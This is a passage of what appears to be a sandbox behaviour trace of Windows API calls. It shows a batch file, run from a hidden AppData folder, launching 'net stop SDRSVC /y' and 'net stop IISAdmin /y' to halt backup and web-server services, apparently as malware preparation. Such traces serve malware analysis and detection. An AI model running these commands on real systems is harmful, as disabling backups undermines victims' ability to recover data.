Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0205.560] GetProcessHeap () returned 0x3e0000 [0205.560] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0205.560] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.560] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.560] GetLastError () returned 0x2 [0205.561] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.561] GetLastError () returned 0x2 [0205.561] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.562] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0205.562] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0205.562] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.562] GetLastError () returned 0x2 [0205.563] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0205.563] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0205.563] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.564] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0205.564] SetErrorMode (uMode=0x0) returned 0x1 [0205.564] GetProcessHeap () returned 0x3e0000 [0205.564] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0205.564] GetProcessHeap () returned 0x3e0000 [0205.564] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0205.564] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.564] GetProcessHeap () returned 0x3e0000 [0205.564] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0205.564] GetProcessHeap () returned 0x3e0000 [0205.564] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0205.565] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0205.565] GetProcessHeap () returned 0x3e0000 [0205.565] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0205.565] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.565] GetProcessHeap () returned 0x3e0000 [0205.565] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0205.565] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0205.565] GetProcessHeap () returned 0x3e0000 [0205.565] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0205.566] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.566] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.566] GetLastError () returned 0x2 [0205.566] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.567] GetLastError () returned 0x2 [0205.567] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.567] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0205.567] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0205.568] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.568] GetLastError () returned 0x2 [0205.568] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0205.568] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0205.569] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.569] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0205.569] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0205.569] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0205.569] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0205.569] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SDRSVC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SDRSVC /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SDRSVC /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xb6c, dwThreadId=0xb7c)) returned 1 [0205.574] CloseHandle (hObject=0x74) returned 1 [0205.574] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0205.574] GetProcessHeap () returned 0x3e0000 [0205.574] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.574] GetEnvironmentStringsW () returned 0x3f8408* [0205.574] GetProcessHeap () returned 0x3e0000 [0205.574] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.574] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.574] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0205.716] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0205.716] CloseHandle (hObject=0x78) returned 1 [0205.716] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0205.716] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0205.716] GetProcessHeap () returned 0x3e0000 [0205.716] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.716] GetEnvironmentStringsW () returned 0x3f8408* [0205.716] GetProcessHeap () returned 0x3e0000 [0205.716] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.717] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.717] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0205.717] GetProcessHeap () returned 0x3e0000 [0205.717] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.717] GetEnvironmentStringsW () returned 0x3f8408* [0205.717] GetProcessHeap () returned 0x3e0000 [0205.717] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.717] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.717] GetProcessHeap () returned 0x3e0000 [0205.717] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0205.717] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0205.717] _get_osfhandle (_FileHandle=1) returned 0x264 [0205.717] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0205.718] _get_osfhandle (_FileHandle=1) returned 0x264 [0205.718] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0205.718] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0205.718] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0205.718] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0205.718] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0205.718] SetConsoleInputExeNameW () returned 0x1 [0205.718] GetConsoleOutputCP () returned 0x1b5 [0205.718] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0205.718] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.719] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0205.719] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0205.719] _get_osfhandle (_FileHandle=3) returned 0x78 [0205.719] SetFilePointer (in: hFile=0x78, lDistanceToMove=3969, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf81 [0205.719] GetProcessHeap () returned 0x3e0000 [0205.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0205.719] GetProcessHeap () returned 0x3e0000 [0205.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0205.719] GetProcessHeap () returned 0x3e0000 [0205.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0205.719] GetProcessHeap () returned 0x3e0000 [0205.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0205.719] GetProcessHeap () returned 0x3e0000 [0205.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0205.719] GetProcessHeap () returned 0x3e0000 [0205.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0205.719] GetProcessHeap () returned 0x3e0000 [0205.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0205.719] GetProcessHeap () returned 0x3e0000 [0205.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0205.719] GetProcessHeap () returned 0x3e0000 [0205.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0205.719] GetProcessHeap () returned 0x3e0000 [0205.720] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0205.720] GetProcessHeap () returned 0x3e0000 [0205.720] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0205.720] GetProcessHeap () returned 0x3e0000 [0205.720] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0205.720] GetProcessHeap () returned 0x3e0000 [0205.720] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0205.720] _get_osfhandle (_FileHandle=3) returned 0x78 [0205.720] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf81 [0205.720] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x940, lpOverlapped=0x0) returned 1 [0205.720] SetFilePointer (in: hFile=0x78, lDistanceToMove=3991, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf97 [0205.720] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=22, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop IISAdmin /y\r\n2008 /y\r\n\r\n/y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 22 [0205.720] _get_osfhandle (_FileHandle=3) returned 0x78 [0205.720] GetFileType (hFile=0x78) returned 0x1 [0205.720] _get_osfhandle (_FileHandle=3) returned 0x78 [0205.720] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf97 [0205.721] GetProcessHeap () returned 0x3e0000 [0205.721] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0205.721] GetProcessHeap () returned 0x3e0000 [0205.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0205.724] _tell (_FileHandle=3) returned 3991 [0205.724] _close (_FileHandle=3) returned 0 [0205.724] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0205.724] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0205.724] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0205.724] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0205.724] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0205.724] _wcsicmp (_String1="net", _String2="CD") returned 11 [0205.724] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0205.724] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0205.724] _wcsicmp (_String1="net", _String2="REN") returned -4 [0205.724] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0205.724] _wcsicmp (_String1="net", _String2="SET") returned -5 [0205.724] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0205.724] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0205.724] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0205.724] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0205.724] _wcsicmp (_String1="net", _String2="MD") returned 1 [0205.724] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0205.724] _wcsicmp (_String1="net", _String2="RD") returned -4 [0205.724] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0205.724] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0205.724] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0205.724] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0205.724] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0205.724] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0205.724] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0205.725] _wcsicmp (_String1="net", _String2="VER") returned -8 [0205.725] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0205.725] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0205.725] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0205.725] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0205.725] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0205.725] _wcsicmp (_String1="net", _String2="START") returned -5 [0205.725] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0205.725] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0205.725] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0205.725] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0205.725] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0205.725] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0205.725] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0205.725] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0205.725] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0205.725] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0205.725] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0205.725] SetErrorMode (uMode=0x0) returned 0x1 [0205.725] GetProcessHeap () returned 0x3e0000 [0205.725] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0205.725] GetProcessHeap () returned 0x3e0000 [0205.725] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0205.726] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.726] GetProcessHeap () returned 0x3e0000 [0205.726] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0205.726] GetProcessHeap () returned 0x3e0000 [0205.726] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0205.726] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0205.726] GetProcessHeap () returned 0x3e0000 [0205.726] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0205.726] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.726] GetProcessHeap () returned 0x3e0000 [0205.726] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0205.727] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0205.727] GetProcessHeap () returned 0x3e0000 [0205.727] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0205.727] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.728] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.728] GetLastError () returned 0x2 [0205.728] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.728] GetLastError () returned 0x2 [0205.728] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.729] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0205.729] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0205.729] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.729] GetLastError () returned 0x2 [0205.730] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0205.730] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0205.730] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.731] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0205.731] SetErrorMode (uMode=0x0) returned 0x1 [0205.731] GetProcessHeap () returned 0x3e0000 [0205.731] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0205.731] GetProcessHeap () returned 0x3e0000 [0205.731] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0205.731] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.731] GetProcessHeap () returned 0x3e0000 [0205.731] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0205.731] GetProcessHeap () returned 0x3e0000 [0205.731] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0205.732] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0205.732] GetProcessHeap () returned 0x3e0000 [0205.732] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0205.732] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.732] GetProcessHeap () returned 0x3e0000 [0205.732] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0205.732] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0205.732] GetProcessHeap () returned 0x3e0000 [0205.732] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0205.733] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.733] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.733] GetLastError () returned 0x2 [0205.733] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.734] GetLastError () returned 0x2 [0205.734] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.734] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0205.734] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0205.735] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.735] GetLastError () returned 0x2 [0205.735] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0205.735] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0205.736] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.736] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0205.736] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0205.736] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0205.737] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0205.737] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop IISAdmin /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, 